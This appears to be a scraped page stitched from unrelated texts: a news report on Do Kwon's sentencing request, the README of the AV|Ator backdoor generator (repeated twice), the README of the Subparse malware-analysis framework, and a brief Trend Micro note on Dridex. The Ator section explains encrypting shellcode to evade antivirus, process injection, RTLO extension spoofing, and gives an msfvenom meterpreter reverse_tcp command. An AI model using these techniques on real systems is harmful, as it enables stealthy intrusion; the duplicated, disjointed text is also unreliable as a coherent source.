The lawyers of Terraform Labsβ co-founder are reportedly seeking a lesser sentence for the South Korean crypto entrepreneurβs role in the multi-billion-dollar collapse, claiming that he has already βsuffered substantiallyβ for his crimes.
Terraβs Do Kwon Says Five Years In Prison Will Suffice
On Wednesday, Terraform Labsβ co-founder and former CEO, Do Kwon, requested a maximum five-year prison term for his involvement in the $40 billion collapse of TerraUSD (UST) stablecoin in 2022.
According to the sentencing recommendation reviewed by Bloomberg, Kwonβs legal team affirmed that the Terraform co-founder should receive a five-year sentence, as he has already spent nearly three years locked up, βwith more than half that time in brutal conditions in Montenegro.β
The former CEOβs lawyers argued that he had βsuffered substantially for his crimes,β and the requested prison term would suffice, adding that the prosecutorβs expected recommendation of a 12-year sentence is ββfar greater than necessaryβ to achieve justice.β
Moreover, the court filing reportedly stressed that Kwon had already agreed to forfeit more than $19 million and some properties as part of the August plea deal. As reported by Bitcoinist, Kwon pleaded guilty in August to two of the nine charges indicted by US authorities.
Notably, he initially pleaded not guilty in January to a nine-count indictment that charged him with securities fraud, wire fraud, commodities fraud, and conspiracy to commit money laundering. However, he changed his stance in August, pleading guilty to conspiracy to defraud and wire fraud.
At the time, Kwon also apologized for his actions, affirming that he βmade false and misleading statementsβ about why TerraUSD regained its peg in 2021 by βfailing to disclose a trading firmβs role in restoring that peg,β adding, βWhat I did was wrong.β
Prosecutors are expected to file their sentencing recommendation soon. As part of the plea deal, they previously agreed not to seek more than 12 years in prison for the Terraform Labs co-founder. The sentencing by US District Judge Paul Engelmayer is scheduled for December 11, 2025, in Manhattan.
Β
South Koreaβs Prosecution Pending
In the sentencing recommendation, Kwonβs lawyers stressed that the former CEO still faces trial in his home country, South Korea, for the same conduct, noting that local prosecutors there are seeking a prison term of up to 40 years.
Following the collapse of Terraform Labs, both South Korean and US authorities sought to bring Kwon to justice. Nonetheless, he had been on the run for months, fleeing his home country and Singapore ahead of the companyβs downfall.
In March 2023, Montenegrin authorities detained him along with Terraform Labβs former finance officer, Han Chang-joon, for trying to travel with fake documents at the Podgorica Airport. Notably, Kwon was under MontenegroβsΒ custody for over a year and a half and faced a four-month sentence, later receiving an extra two months at the request of the US and South Korea.
The two countries entered a prolonged battle to bring the crypto entrepreneur to trial in each country. Initially, Montenegrin authorities approved South Koreaβs extradition request, but he was ultimately extradited to the US on December 31, 2024, after Montenegroβs interior ministry signed their request.
Ator: Is a swordsman, alchemist, scientist, magician, scholar, and engineer, with the ability to sometimes produce objects out of thin air (https://en.wikipedia.org/wiki/Ator)
About://purpose
AV|Ator is a backdoor generator utility, which uses cryptographic and injection techniques in order to bypass AV detection. More specifically:
It uses AES encryption in order to encrypt a given shellcode
Generates an executable file which contains the encrypted payload
The shellcode is decrypted and injected to the target system using various injection techniques
Portable executable injection which involves writing malicious code directly into the process (without a file on disk) then invoking execution with either additional code or by creating a remote thread. The displacement of the injected code introduces the additional requirement for functionality to remap memory references. Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue.
Thread execution hijacking which involves injecting malicious code or the path to a DLL into a thread of a process. Similar to Process Hollowing, the thread must first be suspended.
Usage
The application has a form which consists of three main inputs (See screenshot bellow):
A text containing the encryption key used to encrypt the shellcode
A text containing the IV used for AES encryption
A text containing the shellcode
Important note: The shellcode should be provided as a C# byte array.
The default values contain shellcode that executes notepad.exe (32bit). This demo is provided as an indication of how the code should be formed (using msfvenom, this can be easily done with the -f csharp switch, e.g. msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=XXXX -f csharp).
After filling the provided inputs and selecting the output path an executable is generated according to the chosen options.
RTLO option
In simple words, spoof an executable file to look like having an "innocent" extention like 'pdf', 'txt' etc. E.g. the file "testcod.exe" will be interpreted as "tesexe.doc"
Beware of the fact that some AVs alert the spoof by its own as a malware.
Set custom icon
I guess you all know what it is :)
Bypassing Kaspersky AV on a Win 10 x64 host (TEST CASE)
Getting a shell in a windows 10 machine running fully updated kaspersky AV
Install Mono according to your linux distribution, download and run the binaries
e.g. in kali:
root@kali# apt install mono-devel
root@kali# mono aviator.exe
Credits
To Damon Mohammadbagher for the encryption procedure
Disclaimer
I developed this app in order to overcome the demanding challenges of the pentest process and this is the ONLY WAY that this app should be used. Make sure that you have the required permission to use it against a system and never use it for illegal purposes.
Ator: Is a swordsman, alchemist, scientist, magician, scholar, and engineer, with the ability to sometimes produce objects out of thin air (https://en.wikipedia.org/wiki/Ator)
About://purpose
AV|Ator is a backdoor generator utility, which uses cryptographic and injection techniques in order to bypass AV detection. More specifically:
It uses AES encryption in order to encrypt a given shellcode
Generates an executable file which contains the encrypted payload
The shellcode is decrypted and injected to the target system using various injection techniques
Portable executable injection which involves writing malicious code directly into the process (without a file on disk) then invoking execution with either additional code or by creating a remote thread. The displacement of the injected code introduces the additional requirement for functionality to remap memory references. Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue.
Thread execution hijacking which involves injecting malicious code or the path to a DLL into a thread of a process. Similar to Process Hollowing, the thread must first be suspended.
Usage
The application has a form which consists of three main inputs (See screenshot bellow):
A text containing the encryption key used to encrypt the shellcode
A text containing the IV used for AES encryption
A text containing the shellcode
Important note: The shellcode should be provided as a C# byte array.
The default values contain shellcode that executes notepad.exe (32bit). This demo is provided as an indication of how the code should be formed (using msfvenom, this can be easily done with the -f csharp switch, e.g. msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=XXXX -f csharp).
After filling the provided inputs and selecting the output path an executable is generated according to the chosen options.
RTLO option
In simple words, spoof an executable file to look like having an "innocent" extention like 'pdf', 'txt' etc. E.g. the file "testcod.exe" will be interpreted as "tesexe.doc"
Beware of the fact that some AVs alert the spoof by its own as a malware.
Set custom icon
I guess you all know what it is :)
Bypassing Kaspersky AV on a Win 10 x64 host (TEST CASE)
Getting a shell in a windows 10 machine running fully updated kaspersky AV
Install Mono according to your linux distribution, download and run the binaries
e.g. in kali:
root@kali# apt install mono-devel
root@kali# mono aviator.exe
Credits
To Damon Mohammadbagher for the encryption procedure
Disclaimer
I developed this app in order to overcome the demanding challenges of the pentest process and this is the ONLY WAY that this app should be used. Make sure that you have the required permission to use it against a system and never use it for illegal purposes.
Subparse, is a modular framework developed by Josh Strochein, Aaron Baker, and Odin Bernstein. The framework is designed to parse and index malware files and present the information found during the parsing in a searchable web-viewer. The framework is modular, making use of a core parsing engine, parsing modules, and a variety of enrichers that add additional information to the malware indices. The main input values for the framework are directories of malware files, which the core parsing engine or a user-specified parsing engine parses before adding additional information from any user-specified enrichment engine all before indexing the information parsed into an elasticsearch index. The information gathered can then be searched and viewed via a web-viewer, which also allows for filtering on any value gathered from any file. There are currently 3 parsing engine, the default parsing modules (ELFParser, OLEParser and PEParser), and 4 enrichment modules (ABUSEEnricher, C APEEnricher, STRINGEnricher and YARAEnricher).
Β
Getting Started
Software Requirements
To get started using Subparse there are a few requrired/recommened programs that need to be installed and setup before trying to work with our software.
After getting the required/recommended software installed to your system there are a few other steps that need to be taken to get Subparse installed.
Python Requirements Python requires some other packages to be installed that Subparse is dependent on for its processes. To get the Python set up completed navigate to the location of your Subparse installation and go to the *parser* folder. The following commands that you will need to use to install the Python requirements is:
sudo get apt install build-essential pip3 install -r ./requirements.txt
Docker Requirements Since Subparse uses Docker for its backend and web interface, the set up of the Docker containers needs to be completed before being able to use the program. To do this navigate to the root directory of the Subparse installation location, and use the following command to set up the docker instances:
docker-compose up
Note: This might take a little time due to downloading the images and setting up the containers that will be needed by Subparse.
Enters service mode allowing for mode samples to be added to the SAMPLES_DIR while processing
Viewing Results
To view the results from Subparse's parsers, navigate to localhost:8080. If you are having trouble viewing the site, make sure that you have the container started up in Docker and that there is not another process running on port 8080 that could cause the site to not be available.
Β
General Information Collected
Before any parser is executed general information is collected about the sample regardless of the underlying file type. This information includes:
MD5 hash of the sample
SHA256 hash of the sample
Sample name
Sample size
Extension of sample
Derived extension of sample
Parser Modules
Parsers are ONLY executed on samples that match the file type. For example, PE files will by default have the PEParser executed against them due to the file type corresponding with those the PEParser is able to examine.
Default Modules
ELFParser This is the default parsing module that will be executed against ELF files. Information that is collected:
General Information
Program Headers
Section Headers
Notes
Architecture Specific Data
Version Information
Arm Unwind Information
Relocation Data
Dynamic Tags
OLEParser This is the default parsing module that will be executed against OLE and RTF formatted files, this uses the OLETools package to obtain data. The information that is collected:
Meta Data
MRaptor
RTF
Times
Indicators
VBA / VBA Macros
OLE Objects
PEParser This is the default parsing module that will be executed against PE files that match or include the file types: PE32 and MS-Dos. Information that is collected:
Section code and count
Entry point
Image base
Signature
Imports
Exports
Β
Enricher Modules
These modules are optional modules that will ONLY get executed if specified via the -e | --enrichers flag on the command line.
Default Modules
ABUSEEnricher This enrichers uses the [Abuse.ch](https://abuse.ch/) API and [Malware Bazaar](https://bazaar.abuse.ch) to collect more information about the sample(s) subparse is analyzing, the information is then aggregated and stored in the Elastic database. CAPEEnricher This enrichers is used to communicate with a CAPEv2 Sandbox instance, to collect more information about the sample(s) through dynamic analysis, the information is then aggregated and stored in the Elastic database utilizing the Kafka Messaging Service for background processing. STRINGEnricher This enricher is a smart string enricher, that will parse the sample for potentially interesting strings. The categories of strings that this enricher looks for include: Audio, Images, Executable Files, Code Calls, Compressed Files, Work (Office Docs.), IP Addresses, IP Address + Port, Website URLs, Command Line Arguments. YARAEnricher This ericher uses a pre-compiled yara file located at: parser/src/enrichers/yara_rules. This pre-compiled file includes rules from VirusTotal and YaraRulesProject
Β
Developing Custom Parsers & Enrichers
Subparse's web view was built using Bootstrap for its CSS, this allows for any built in Bootstrap CSS to be used when developing your own custom Parser/Enricher Vue.js files. We have also provided an example for each to help get started and have also implemented a few custom widgets to ease the process of development and to promote standardization in the way information is being displayed. All Vue.js files are used for dynamically displaying information from the custom Parser/Enricher and are used as templates for the data.
Note: Naming conventions with both class and file names must be strictly adheared to, this is the first thing that should be checked if you run into issues now getting your custom Parser/Enricher to be executed. The naming convention of your Parser/Enricher must use the same name across all of the files and class names.
The logger object is a singleton implementation of the default Python logger. For indepth usage please reference the Offical Doc. For Subparse the only logging methods that we recommend using are the logging levels for output. These are:
debug
warning
error
critical
exception
log
info
ACKNOWLEDGEMENTS
This research and all the co-authors have been supported by NSA Grant H98230-20-1-0326.
According to Trend Micro research, an updated version of Dridex implemented an improved technique of downloading Trojans to user devices and without masquerading as a working software.
Dridex is a Trojan that is used to introduce malware and subsequently steal bank data. The Evil Corp. group is believed to be behind the development.
Initially early companies sent phishing emails to users with Excel files inside which there were Trojan programs.
Behind the results of the Dridex analysis, which was conducted by Trend Micro, a Mach-O file was found. As you know, an early version of it appeared back in April 2019 on VirusTotal. From the beginning of its use until the end of December 2022, a total of about 67 artifacts were found. Every single one of them contained Auto-Open, a malicious macro that had the ability to run automatically when a document was opened.
The malware communicates with the server, which eventually leads to a Dridex dropper being downloaded to the infected computer.
Login
